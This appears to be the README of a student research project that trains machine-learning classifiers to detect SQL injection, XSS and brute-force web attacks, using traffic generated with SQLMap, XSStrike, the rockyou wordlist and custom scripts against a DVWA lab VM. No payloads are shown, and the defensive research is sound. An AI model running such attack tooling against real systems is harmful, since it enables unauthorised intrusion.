This repository contains the full workflow for developing a machine-learning–based Network Intrusion Detection System (NIDS) focused on detecting application-layer web attacks:
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Brute-Force Authentication Attacks
- Benign Web Traffic
The project integrates automated attack simulation, packet capture, flow-based feature extraction, dataset preprocessing, and model training to produce a robust intrusion detection model capable of identifying web-application threats.
This project constructs a hybrid dataset derived from:
- Public SQL Injection datasets (Kaggle)
- SQLMap-generated SQLi traffic against DVWA
- XSStrike-generated XSS payloads
- Custom reflection-based attack scripts
- Brute-force authentication attempts
- Benign traffic captures
Captured packets are processed using CICFlowMeter to extract flow-based features, which are then cleaned, balanced, and used to train multiple ML classifiers.
RESEARCH PROJECT SCRIPTS/
│
├── Attack Scripts/
│ ├── Attack setup.md
│ ├── attack_script.py
│ ├── bruteforce_script.py
│
├── Dataset Processing/
│ ├── SQL Dataset Preprocessing.ipynb
│ ├── XSS Dataset Preprocessing.ipynb
│ ├── final_sqli_dataset.csv
│ ├── xss_dataset.csv
│
├── Datasets/
│ ├── final_sqli_dataset.csv
│ ├── Payloads.csv
│ ├── rockyou.txt
│ ├── sql_benign.txt
│ ├── sql_mal.txt
│ ├── xss_benign.txt
│ ├── xss_mal.txt
│
├── EDA & ModelEval/
│ ├── Web_Application_NIDS_EDA_and_Model_Training.ipynb
│
└── (PCAP files captured externally)
All attacks are executed against a DVWA instance hosted in VirtualBox.
| Script | Purpose |
|---|---|
| attack_script.py | Generates SQLi or XSS traffic by sending payloads and detecting reflection |
| bruteforce_script.py | Simulates repeated login attempts |
| Wordlists | Define malicious and benign payload variations |
Loopback capture:
sudo tcpdump -i lo -w dvwa_traffic.pcap port 80Host-only VirtualBox capture:
sudo tcpdump -i vboxnet0 -w dvwa_traffic.pcap host <DVWA_IP>Hybrid dataset from:
- Kaggle SQL Injection dataset
- SQLMap-generated attack payloads
- Curated benign SQL patterns
Generated using:
- XSStrike payload generation
- Reflection-based XSS detection
- Manually crafted benign and malicious samples
Created via:
- rockyou.txt wordlist
- brute-force script
- Packet capture during repeated login attempts
Web_Application_NIDS_EDA_and_Model_Training.ipynb includes:
- EDA and feature inspection
- PCA visualisation
- SMOTE balancing
- Model training (RF, XGB, LGBM, KNN, SVM)
- Confusion matrices, F1-score, ROC-AUC
- Runtime benchmarking
- DVWA
- VirtualBox
- SQLMap
- XSStrike
- tcpdump
- CICFlowMeter
- Python (scikit-learn, pandas, numpy, xgboost, lightgbm)
- Jupyter Notebook
- VS Code
- Start DVWA in VirtualBox
- Begin packet capture using tcpdump
- Run attack scripts
- Convert PCAP files using CICFlowMeter
- Run preprocessing notebooks
- Train and evaluate models in the EDA notebook
Mandisa Nyadenga
BTech (Hons) Computer Engineering, CPUT
Supervisor:
Dr. O. P. Babalola
Cape Peninsula University of Technology (CPUT)